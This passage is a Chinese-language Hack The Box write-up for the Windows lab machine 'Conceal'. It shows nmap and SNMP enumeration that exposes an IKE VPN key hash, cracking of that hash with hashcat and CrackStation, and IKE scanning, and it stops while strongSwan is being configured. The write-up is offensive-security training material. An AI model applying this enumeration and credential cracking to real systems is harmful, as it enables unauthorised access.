Conceal-htb-writeup

0x00 靶场技能介绍

章节技能:snmp协议枚举、snmp-check工具使用、snmpwalk工具使用、ikevpn使用、ikevpn密码破解、网站目录扫描、FTP匿名登录、FTP服务put提交文件、Aspshell上传、invoke-powershelltcp脚本使用、烂土豆提权

参考链接:https://0xdf.gitlab.io/2019/05/18/htb-conceal.html#install-strongswan

参考链接:https://htbwp.readthedocs.io/en/latest/windows/Conceal.html

0x01 用户权限获取

1、靶机介绍

隐藏是一个“难”的问题。难度 Windows 教授 IKE 协议的枚举以及在传输模式下隐藏配置 IPSec。一旦配置并工作,防火墙就会关闭,并且可以通过 FTP 上传 shell 并执行。在列出修补程序时,发现该盒子容易受到 ALPC 任务计划程序 LPE 的影响。或者,授予用户的 SeImpersonatePrivilege 允许获取 SYSTEM shell。

2、获取下靶机IP地址:10.10.10.116

3、扫描下开放端口信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.10.116 -oG allports -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 00:10 CST
Nmap scan report for 10.10.10.116
Host is up.
All 65535 scanned ports on 10.10.10.116 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 14.73 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.10.116 -oG allports1 -Pn -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 00:11 CST
Nmap scan report for 10.10.10.116
Host is up (0.20s latency).
Not shown: 65533 open|filtered udp ports (no-response)
PORT    STATE SERVICE
161/udp open  snmp
500/udp open  isakmp

Nmap done: 1 IP address (1 host up) scanned in 14.70 seconds
                                                                                                                                                                                         
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p161,500 -sC -sV --min-rate=10000 10.10.10.116 -oG allports1 -Pn -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 00:12 CST
Nmap scan report for 10.10.10.116
Host is up (0.12s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server (public)
| snmp-sysdescr: Hardware: AMD64 Family 25 Model 1 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
|_  System uptime: 8m2.90s (48290 timeticks)
| snmp-win32-users: 
|   Administrator
|   DefaultAccount
|   Destitute
|_  Guest
| snmp-win32-software: 
|   Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161; 2021-03-17T15:16:36
|   Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161; 2021-03-17T15:16:36
|_  VMware Tools; 2021-03-17T15:16:36
500/udp open  isakmp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port500-UDP:V=7.94SVN%I=7%D=4/15%Time=661C0068%P=aarch64-unknown-linux-
SF:gnu%r(IPSEC_START,38,"1'\xfc\xb08\x10\x9e\x89\xfcx\x91q\xb2\xc9\xa1\xf2
SF:\x0b\x10\x05\x009p\xe6\x9c\0\0\x008\0\0\0\x1c\0\0\0\x01\x01\x10\0\x0e1'
SF:\xfc\xb08\x10\x9e\x89\xfcx\x91q\xb2\xc9\xa1\xf2");
Service Info: Host: Conceal

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.28 seconds

4、这里只有udp协议的161端口开放和一个新发现的500端口,这里我们先枚举161端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
┌──(kali㉿offsec)-[~/Desktop]
└─$ snmp-check 10.10.10.116                                                        
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.10.116:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 10.10.10.116
  Hostname                      : Conceal
  Description                   : Hardware: AMD64 Family 25 Model 1 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
  Contact                       : IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
  Location                      : -
  Uptime snmp                   : 00:14:28.68
  Uptime system                 : 00:14:17.89
  System date                   : 2024-4-14 09:17:17.1
  Domain                        : WORKGROUP

[*] User accounts:

  Guest               
  Destitute           
  Administrator       
  DefaultAccount      

[*] Network information:

  IP forwarding enabled         : no
  Default TTL                   : 128
  TCP segments received         : 190877
  TCP segments sent             : 8
  TCP segments retrans          : 4
  Input datagrams               : 385239
  Delivered datagrams           : 288540
  Output datagrams              : 672

[*] Network interfaces:

  Interface                     : [ up ] Software Loopback Interface 1
  Id                            : 1
  Mac Address                   : :::::
  Type                          : softwareLoopback
  Speed                         : 1073 Mbps
  MTU                           : 1500
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IKEv2)
  Id                            : 2
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (PPTP)
  Id                            : 3
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Microsoft Kernel Debug Network Adapter
  Id                            : 4
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (L2TP)
  Id                            : 5
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Teredo Tunneling Pseudo-Interface
  Id                            : 6
  Mac Address                   : 00:00:00:00:00:00
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IP)
  Id                            : 7
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (SSTP)
  Id                            : 8
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IPv6)
  Id                            : 9
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (PPPOE)
  Id                            : 10
  Mac Address                   : :::::
  Type                          : ppp
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (Network Monitor)
  Id                            : 11
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] vmxnet3 Ethernet Adapter
  Id                            : 12
  Mac Address                   : 00:50:56:b9:84:25
  Type                          : ethernet-csmacd
  Speed                         : 4294 Mbps
  MTU                           : 1500
  In octets                     : 18419940
  Out octets                    : 60812

  Interface                     : [ up ] vmxnet3 Ethernet Adapter-WFP Native MAC Layer LightWeight Filter-0000
  Id                            : 13
  Mac Address                   : 00:50:56:b9:84:25
  Type                          : ethernet-csmacd
  Speed                         : 4294 Mbps
  MTU                           : 1500
  In octets                     : 18419940
  Out octets                    : 60812

  Interface                     : [ up ] vmxnet3 Ethernet Adapter-QoS Packet Scheduler-0000
  Id                            : 14
  Mac Address                   : 00:50:56:b9:84:25
  Type                          : ethernet-csmacd
  Speed                         : 4294 Mbps
  MTU                           : 1500
  In octets                     : 18419940
  Out octets                    : 60812

  Interface                     : [ up ] vmxnet3 Ethernet Adapter-WFP 802.3 MAC Layer LightWeight Filter-0000
  Id                            : 15
  Mac Address                   : 00:50:56:b9:84:25
  Type                          : ethernet-csmacd
  Speed                         : 4294 Mbps
  MTU                           : 1500
  In octets                     : 18419940
  Out octets                    : 60812


[*] Network IP:

  Id                    IP Address            Netmask               Broadcast           
  12                    10.10.10.116          255.255.255.0         1                   
  1                     127.0.0.1             255.0.0.0             1                   

[*] Routing information:

  Destination           Next hop              Mask                  Metric              
  0.0.0.0               10.10.10.2            0.0.0.0               271                 
  10.10.10.0            10.10.10.116          255.255.255.0         271                 
  10.10.10.116          10.10.10.116          255.255.255.255       271                 
  10.10.10.255          10.10.10.116          255.255.255.255       271                 
  127.0.0.0             127.0.0.1             255.0.0.0             331                 
  127.0.0.1             127.0.0.1             255.255.255.255       331                 
  127.255.255.255       127.0.0.1             255.255.255.255       331                 
  224.0.0.0             127.0.0.1             240.0.0.0             331                 
  255.255.255.255       127.0.0.1             255.255.255.255       331                 

[*] TCP connections and listening ports:

  Local address         Local port            Remote address        Remote port           State               
  0.0.0.0               21                    0.0.0.0               0                     listen              
  0.0.0.0               80                    0.0.0.0               0                     listen              
  0.0.0.0               135                   0.0.0.0               0                     listen              
  0.0.0.0               445                   0.0.0.0               0                     listen              
  0.0.0.0               49664                 0.0.0.0               0                     listen              
  0.0.0.0               49665                 0.0.0.0               0                     listen              
  0.0.0.0               49666                 0.0.0.0               0                     listen              
  0.0.0.0               49667                 0.0.0.0               0                     listen              
  0.0.0.0               49668                 0.0.0.0               0                     listen              
  0.0.0.0               49669                 0.0.0.0               0                     listen              
  0.0.0.0               49670                 0.0.0.0               0                     listen              
  10.10.10.116          139                   0.0.0.0               0                     listen              

[*] Listening UDP ports:

  Local address         Local port          
  0.0.0.0               123                 
  0.0.0.0               161                 
  0.0.0.0               500                 
  0.0.0.0               4500                
  0.0.0.0               5050                
  0.0.0.0               5353                
  0.0.0.0               5355                
  0.0.0.0               52733               
  10.10.10.116          137                 
  10.10.10.116          138                 
  10.10.10.116          1900                
  10.10.10.116          52531               
  127.0.0.1             1900                
  127.0.0.1             52532               

[*] Network services:

  Index                 Name                
  0                     Power               
  1                     Server              
  2                     Themes              
  3                     IP Helper           
  4                     DNS Client          
  5                     Data Usage          
  6                     Superfetch          
  7                     DHCP Client         
  8                     Time Broker         
  9                     TokenBroker         
  10                    Workstation         
  11                    SNMP Service        
  12                    User Manager        
  13                    VMware Tools        
  14                    Windows Time        
  15                    CoreMessaging       
  16                    Plug and Play       
  17                    Print Spooler       
  18                    Windows Audio       
  19                    SSDP Discovery      
  20                    Task Scheduler      
  21                    Windows Search      
  22                    Windows Update      
  23                    Security Center     
  24                    Storage Service     
  25                    Windows Firewall    
  26                    CNG Key Isolation   
  27                    COM+ Event System   
  28                    Windows Event Log   
  29                    IPsec Policy Agent  
  30                    Geolocation Service 
  31                    Group Policy Client 
  32                    RPC Endpoint Mapper 
  33                    Data Sharing Service
  34                    Device Setup Manager
  35                    Network List Service
  36                    System Events Broker
  37                    User Profile Service
  38                    Base Filtering Engine
  39                    Local Session Manager
  40                    Microsoft FTP Service
  41                    TCP/IP NetBIOS Helper
  42                    Cryptographic Services
  43                    Diagnostic System Host
  44                    COM+ System Application
  45                    Diagnostic Service Host
  46                    Shell Hardware Detection
  47                    State Repository Service
  48                    Diagnostic Policy Service
  49                    Network Connection Broker
  50                    Security Accounts Manager
  51                    Network Location Awareness
  52                    Windows Connection Manager
  53                    Windows Font Cache Service
  54                    Remote Procedure Call (RPC)
  55                    DCOM Server Process Launcher
  56                    Microsoft Storage Spaces SMP
  57                    Windows Audio Endpoint Builder
  58                    Application Host Helper Service
  59                    Network Store Interface Service
  60                    Client License Service (ClipSVC)
  61                    Distributed Link Tracking Client
  62                    AppX Deployment Service (AppXSVC)
  63                    System Event Notification Service
  64                    World Wide Web Publishing Service
  65                    Connected Devices Platform Service
  66                    Windows Defender Antivirus Service
  67                    Windows Management Instrumentation
  68                    Windows Process Activation Service
  69                    Distributed Transaction Coordinator
  70                    IKE and AuthIP IPsec Keying Modules
  71                    VMware CAF Management Agent Service
  72                    VMware Physical Disk Helper Service
  73                    Background Intelligent Transfer Service
  74                    Background Tasks Infrastructure Service
  75                    Program Compatibility Assistant Service
  76                    VMware Alias Manager and Ticket Service
  77                    Connected User Experiences and Telemetry
  78                    WinHTTP Web Proxy Auto-Discovery Service
  79                    Windows Defender Security Centre Service
  80                    Windows Push Notifications System Service
  81                    Windows Defender Antivirus Network Inspection Service
  82                    Windows Driver Foundation - User-mode Driver Framework

[*] Processes:

  Id                    Status                Name                  Path                  Parameters          
  1                     running               System Idle Process                                             
  4                     running               System                                                          
  300                   running               smss.exe                                                        
  388                   running               csrss.exe                                                       
  412                   running               svchost.exe           C:\Windows\system32\  -k LocalServiceNoNetwork
  468                   running               wininit.exe                                                     
  476                   running               csrss.exe                                                       
  532                   running               winlogon.exe                                                    
  572                   running               svchost.exe           C:\Windows\system32\  -k LocalService     
  604                   running               services.exe                                                    
  612                   running               lsass.exe             C:\Windows\system32\                      
  700                   running               svchost.exe           C:\Windows\system32\  -k DcomLaunch       
  720                   running               fontdrvhost.exe                                                 
  728                   running               fontdrvhost.exe                                                 
  820                   running               svchost.exe           C:\Windows\system32\  -k RPCSS            
  900                   running               dwm.exe                                                         
  948                   running               svchost.exe           C:\Windows\system32\  -k netsvcs          
  976                   running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1012                  running               svchost.exe           C:\Windows\System32\  -k LocalSystemNetworkRestricted
  1056                  running               svchost.exe           C:\Windows\System32\  -k NetworkService   
  1096                  running               vmacthlp.exe          C:\Program Files\VMware\VMware Tools\                      
  1212                  running               Memory Compression                                              
  1268                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1396                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1412                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceNetworkRestricted
  1420                  running               conhost.exe           \??\C:\Windows\system32\  0x4                 
  1516                  running               spoolsv.exe           C:\Windows\System32\                      
  1632                  running               svchost.exe           C:\Windows\system32\  -k appmodel         
  1644                  running               svchost.exe           C:\Windows\system32\  -k LocalSystemNetworkRestricted
  1736                  running               svchost.exe           C:\Windows\system32\  -k apphost          
  1744                  running               svchost.exe           C:\Windows\System32\  -k utcsvc           
  1756                  running               svchost.exe           C:\Windows\system32\  -k ftpsvc           
  1800                  running               taskhostw.exe                                                   
  1836                  running               SecurityHealthService.exe                                            
  1876                  running               snmp.exe              C:\Windows\System32\                      
  1892                  running               VGAuthService.exe     C:\Program Files\VMware\VMware Tools\VMware VGAuth\                      
  1904                  running               vmtoolsd.exe          C:\Program Files\VMware\VMware Tools\                      
  1912                  running               ManagementAgentHost.exe  C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\                      
  1920                  running               svchost.exe           C:\Windows\system32\  -k iissvcs          
  1948                  running               MsMpEng.exe                                                     
  2636                  running               svchost.exe           C:\Windows\system32\  -k NetworkServiceNetworkRestricted
  2840                  running               msdtc.exe             C:\Windows\System32\                      
  2892                  running               svchost.exe                                                     
  2948                  running               WmiPrvSE.exe          C:\Windows\system32\wbem\                      
  3056                  running               dllhost.exe           C:\Windows\system32\  /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
  3124                  running               LogonUI.exe                                 /flags:0x0 /state0:0xa39c9055 /state1:0x41c64e6d
  3180                  running               SearchIndexer.exe     C:\Windows\system32\  /Embedding          
  3480                  running               NisSrv.exe                                                      
  3576                  running               svchost.exe           C:\Windows\System32\  -k smphost          
  3592                  running               WmiPrvSE.exe          C:\Windows\system32\wbem\                      
  3616                  running               MpCmdRun.exe          C:\Program Files\Windows Defender\  -IdleTask -TaskName WdCacheMaintenance
  3864                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceAndNoImpersonation
  4964                  running               SearchProtocolHost.exe  C:\Windows\system32\  Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozil
  5020                  running               SearchFilterHost.exe  C:\Windows\system32\  0 696 700 708 8192 704

[*] Storage information:

  Description                   : ["C:\\ Label:  Serial Number 91180ed"]
  Device id                     : [#<SNMP::Integer:0x0000ffff997a83e0 @value=1>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff997ae5d8 @value=4096>]
  Memory size                   : 14.51 GB
  Memory used                   : 10.08 GB

  Description                   : ["Virtual Memory"]
  Device id                     : [#<SNMP::Integer:0x0000ffff999e9398 @value=2>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff999ef748 @value=65536>]
  Memory size                   : 3.12 GB
  Memory used                   : 990.75 MB

  Description                   : ["Physical Memory"]
  Device id                     : [#<SNMP::Integer:0x0000ffff99a1a560 @value=3>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000ffff99a18918 @value=65536>]
  Memory size                   : 2.00 GB
  Memory used                   : 993.44 MB


[*] File system information:

  Index                         : 1
  Mount point                   : 
  Remote mount point            : -
  Access                        : 1
  Bootable                      : 0

[*] Device information:

  Id                    Type                  Status                Descr               
  1                     unknown               running               Microsoft XPS Document Writer v4
  2                     unknown               running               Microsoft Print To PDF
  3                     unknown               running               Microsoft Shared Fax Driver
  4                     unknown               running               Unknown Processor Type
  5                     unknown               running               Unknown Processor Type
  6                     unknown               unknown               Software Loopback Interface 1
  7                     unknown               unknown               WAN Miniport (IKEv2)
  8                     unknown               unknown               WAN Miniport (PPTP) 
  9                     unknown               unknown               Microsoft Kernel Debug Network Adapter
  10                    unknown               unknown               WAN Miniport (L2TP) 
  11                    unknown               unknown               Teredo Tunneling Pseudo-Interface
  12                    unknown               unknown               WAN Miniport (IP)   
  13                    unknown               unknown               WAN Miniport (SSTP) 
  14                    unknown               unknown               WAN Miniport (IPv6) 
  15                    unknown               unknown               WAN Miniport (PPPOE)
  16                    unknown               unknown               WAN Miniport (Network Monitor)
  17                    unknown               unknown               vmxnet3 Ethernet Adapter
  18                    unknown               unknown               vmxnet3 Ethernet Adapter-WFP Native MAC Layer LightWeight Filter
  19                    unknown               unknown               vmxnet3 Ethernet Adapter-QoS Packet Scheduler-0000
  20                    unknown               unknown               vmxnet3 Ethernet Adapter-WFP 802.3 MAC Layer LightWeight Filter-
  21                    unknown               running               Fixed Disk          
  22                    unknown               running               IBM enhanced (101- or 102-key) keyboard, Subtype=(0)

[*] Software components:

  Index                 Name                
  1                     Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
  2                     VMware Tools        
  3                     Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161

[*] IIS server information:

  TotalBytesSentLowWord         : 0
  TotalBytesReceivedLowWord     : 0
  TotalFilesSent                : 0
  CurrentAnonymousUsers         : 0
  CurrentNonAnonymousUsers      : 0
  TotalAnonymousUsers           : 0
  TotalNonAnonymousUsers        : 0
  MaxAnonymousUsers             : 0
  MaxNonAnonymousUsers          : 0
  CurrentConnections            : 0
  MaxConnections                : 0
  ConnectionAttempts            : 0
  LogonAttempts                 : 0
  Gets                          : 0
  Posts                         : 0
  Heads                         : 0
  Others                        : 0
  CGIRequests                   : 0
  BGIRequests                   : 0
  NotFoundErrors                : 0

5、再继续使用snmpwalk工具枚举一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿offsec)-[~/Desktop]
└─$ snmpwalk -c public -v1 10.10.10.116   
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 25 Model 1 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (79093) 0:13:10.93
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.25.4.2.1.5.1920 = STRING: "-k iissvcs"
iso.3.6.1.2.1.25.4.2.1.5.1948 = ""
iso.3.6.1.2.1.25.4.2.1.5.2636 = STRING: "-k NetworkServiceNetworkRestricted"
iso.3.6.1.2.1.25.4.2.1.5.2840 = ""
iso.3.6.1.2.1.25.4.2.1.5.2892 = ""
iso.3.6.1.2.1.25.4.2.1.5.2948 = ""
iso.3.6.1.2.1.25.4.2.1.5.3056 = STRING: "/Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}"
iso.3.6.1.2.1.25.4.2.1.5.3124 = STRING: " /flags:0x0 /state0:0xa39c9055 /state1:0x41c64e6d"
iso.3.6.1.2.1.25.4.2.1.5.3180 = STRING: "/Embedding"
iso.3.6.1.2.1.25.4.2.1.5.3480 = ""
iso.3.6.1.2.1.25.4.2.1.5.3576 = STRING: "-k smphost"
iso.3.6.1.2.1.25.4.2.1.5.3592 = ""
iso.3.6.1.2.1.25.4.2.1.5.3616 = STRING: " -IdleTask -TaskName WdCacheMaintenance"
iso.3.6.1.2.1.25.4.2.1.5.3864 = STRING: "-k LocalServiceAndNoImpersonation"
iso.3.6.1.2.1.25.4.2.1.5.4964 = STRING: " Global\\UsGthrFltPipeMssGthrPipe2_ Global\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozil"
iso.3.6.1.2.1.25.4.2.1.5.5020 = STRING: " 0 696 700 708 8192 704 "

6、这里枚举snmp服务还是发现了ike vpn 服务的密码

1
IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43

7、这里破解一下

1
2
3
4
https://crackstation.net/

Hash	Type	Result
9C8B1A372B1878851BE2C097031B6E43	NTLM	Dudecake1!

这里使用hashcat再破解下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 1000 ./hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

9c8b1a372b1878851be2c097031b6e43:Dudecake1!               
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 9c8b1a372b1878851be2c097031b6e43
Time.Started.....: Mon Apr 15 00:39:40 2024 (2 secs)
Time.Estimated...: Mon Apr 15 00:39:42 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4339.1 kH/s (0.05ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11222016/14344385 (78.23%)
Rejected.........: 0/11222016 (0.00%)
Restore.Point....: 11220992/14344385 (78.23%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Duke&Braves20 -> Drjay2345
Hardware.Mon.#1..: Util: 37%

Started: Mon Apr 15 00:39:29 2024
Stopped: Mon Apr 15 00:39:43 2024

8、DP 500 用于互联网密钥交换 (IKE),用于建立 IPSEC VPN。我可以使用以下方法对 IKE 进行一些侦察ike-scan:PSec、IKE 组件:SKEME、Oakley、ISAKMP

9、互联网密钥交换 (IKE) 是一种标准协议,用于通过虚拟专用网络 (VPN) 在两方之间建立安全且经过身份验证的通信通道。该协议确保 VPN 协商、远程主机和网络访问的安全。

https://book.hacktricks.xyz/v/cn/network-services-pentesting/ipsec-ike-vpn-pentesting

10、这里在黑客手册上面发现了涉及500端口的信息,按照提示开始枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(kali㉿offsec)-[~/Desktop]
└─$ ike-scan -M 10.10.10.116
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116    Main Mode Handshake returned
        HDR=(CKY-R=c4d8a0b3d7871e2a)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
        VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
        VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
        VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
        VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
        VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
        VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.127 seconds (7.90 hosts/sec).  1 returned handshake; 0 returned notify


┌──(kali㉿offsec)-[~/Desktop]
└─$ ike-scan -M --ikev2 10.10.10.116
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9.5: 1 hosts scanned in 2.431 seconds (0.41 hosts/sec).  0 returned handshake; 0 returned notify
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ ike-scan -M --showbackoff 10.10.10.116
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116    Main Mode Handshake returned
        HDR=(CKY-R=df7b24f738919f1a)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
        VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
        VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
        VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
        VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
        VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
        VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

IKE Backoff Patterns:

IP Address      No.     Recv time               Delta Time
10.10.10.116    1       1713122677.242998       0.000000
10.10.10.116    Implementation guess: Linksys Etherfast

Ending ike-scan 1.9.5: 1 hosts scanned in 60.181 seconds (0.02 hosts/sec).  1 returned handshake; 0 returned notify

11、我将使用strongswan客户端连接到 VPN。我将安装它:

apt install strongswan

12、我需要编辑/etc/ipsec.conf并/etc/ipsec.secrets连接。此参考包含有关该ipsec.conf文件的详细信息。

13、首先是ipsec.secrets文件:

1
2
3
